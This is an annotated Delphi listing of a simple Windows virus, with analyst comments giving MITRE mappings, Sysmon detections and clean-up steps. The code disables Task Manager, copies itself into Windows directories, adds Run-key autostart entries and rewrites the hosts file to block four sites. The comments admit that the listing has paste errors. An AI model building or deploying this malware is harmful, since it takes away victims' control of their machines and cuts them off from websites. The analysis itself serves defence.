// Analyst summary (for detection and clean-up). This Delphi console program, as posted:
//   1. sets the per-user 'DisableTaskMgr' policy value (see LockTaskManager);
//   2. copies 'vir.exe' from the current directory into three locations under the Windows directory;
//   3. writes three values ('Vir1', 'Vir2', 'Vir3') to the machine-wide Run key so the copies start at logon
//      (MITRE ATT&CK T1547.001, Registry Run Keys / Startup Folder);
//   4. appends 127.0.0.1 entries for four sites to the hosts file, which stops those names resolving normally.
// Steps 2-4 write to %WINDIR%, HKEY_LOCAL_MACHINE and the hosts file, which by default need administrative
// rights, so running users without local admin is the main preventive control.
// The leading number on each line is the paste site's line gutter, not part of the program; the listing
// carries paste artefacts and should be read as a description of behaviour, not as a buildable sample.
1program VIR;
2
3uses sysutils, windows, Registry;
4
5 var
6Windir: string; // Windows directory as a Pascal string (filled from WindirP)
7WindirP: PChar; // raw buffer handed to GetWindowsDirectory
8Res : Cardinal; // return value of GetWindowsDirectory
9Reg : TRegistry; // registry object used for the Run-key writes
10host : TextFile; // text-file variable bound to the hosts file
11
12
// LockTaskManager: writes the 'DisableTaskMgr' value under
// HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System.
//   Lock (default True): True writes the string '1'; False writes the string '100'.
//   NOTE(review): what '100' is meant to achieve cannot be told from this listing.
// The value is written with WriteString, i.e. as string data, not through the policy tooling.
// Detection: alert on registry value-set events for this value from a process that is not a
// management agent (for example Sysmon Event ID 13); this maps to MITRE ATT&CK T1112 (Modify Registry).
// Clean-up: delete the 'DisableTaskMgr' value from the key above for the affected user.
13procedure LockTaskManager(Lock : Boolean = True);
14const
15 sKey = 'DisableTaskMgr';
16begin
17 with TRegistry.Create do
18 begin
19 RootKey := HKEY_CURRENT_USER;
// Second argument True lets OpenKey create the Policies\System key when it is absent.
// The early Exit on failure leaves the procedure before CloseKey and Free are reached.
20 if not OpenKey('\Software\Microsoft\Windows\CurrentVersion\Policies\System', True) then Exit;
21 if Lock then WriteString(sKey, '1') else WriteString(sKey, '100');
22 CloseKey;
23 Free;
24 end;
25end;
26
// Program body. Order of actions: Task Manager policy value, self-copy into the Windows
// directory tree, Run-key autostart entries, hosts-file entries. None of the API results
// below is checked except the GetWindowsDirectory return value.
27 begin
// Called with the default argument, so the 'DisableTaskMgr' value is set to '1'.
28LockTaskManager();
// Resolve the Windows directory; WinDir stays empty if the call returns 0.
29WinDirP := StrAlloc(MAX_PATH);
30Res := GetWindowsDirectory(WinDirP, MAX_PATH);
31if Res > 0 then
32WinDir := StrPas(WinDirP);
33
// Each of the three checks below tests a path under <WinDir>\Windows\..., which is not the
// path the following CopyFile writes to. Expect the copy attempt, and the matching
// file-write telemetry, on every run. CopyFile's last argument is false, so an existing
// destination file is overwritten.
// Detection: a new executable named 'vir.exe' created in %WINDIR%, %WINDIR%\system32 or
// %WINDIR%\Temp by a process that is not an installer or the servicing stack
// (for example Sysmon Event ID 11, or file-integrity monitoring on those directories).
34if not FileExists(Windir + '\Windows\System32\vir.exe') then //look for the copy of the program body and copy it if it is not found
35begin
36CopyFile(PChar('vir.exe'), PChar(Windir + '\system32\'+'vir.exe'), false);
37end;
38if not FileExists(Windir + '\Windows\Temp\vir.exe') then
39begin
40CopyFile(PChar('vir.exe'), PChar(Windir + '\Temp\'+'vir.exe'), false);
41end;
42if not FileExists('Windir + '\Windows\vir.exe') then
43begin
44CopyFile(PChar('vir.exe'), PChar(Windir + '\vir.exe'), false);
45end ;
46
// Autostart: three string values in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,
// one per copied file (MITRE ATT&CK T1547.001).
// OpenKey is called with CanCreate = false and its result is ignored; the ValueExists('Vir')
// result is discarded as well, so it has no effect on what is written.
// Detection: registry value-set events on the Run key (for example Sysmon Event ID 13) where the
// data points into %WINDIR%, system32 or Temp; periodic review of autostart entries.
// Clean-up: delete the values 'Vir1', 'Vir2' and 'Vir3' and the three copied files.
47begin
48Reg:=TRegistry.create;
49Reg.RootKey := HKEY_LOCAL_MACHINE;
50Reg.OpenKey('SOFTWARE\Microsoft\Windows\CurrentVersion\Run',false);
51Reg.ValueExists('Vir') ;
52Reg.LazyWrite := True;
53Reg.WriteString('Vir1',Windir + '\system32\'+'vir.exe');
54Reg.WriteString('Vir2',Windir + '\Temp\'+'vir.exe');
55Reg.WriteString('Vir3',Windir + '\vir.exe');
56
57Reg.CloseKey;
58Reg.free;
59
// Hosts-file tampering: a blank line and four '127.0.0.1 <name>' entries are appended, so the
// listed names resolve to the local machine and the sites become unreachable by name.
// Detection: file-integrity monitoring on <WinDir>\system32\drivers\etc\hosts; any write by a
// process other than an administrator's editor or a management agent is worth an alert.
// Clean-up: remove the appended lines and restore the file from a known-good copy.
60AssignFile(host, pchar(Windir+'\system32\drivers\etc\hosts'));//open the hosts file
61Append(host);
62WriteLn(host,'');
63WriteLn(host,'127.0.0.1 yandex.ru');
64WriteLn(host,'127.0.0.1 google.com');
65WriteLn(host,'127.0.0.1 odnoklassniki.ru');
66WriteLn(host,'127.0.0.1 vk.com');
67CloseFile(host);
68end;
69end.
70end.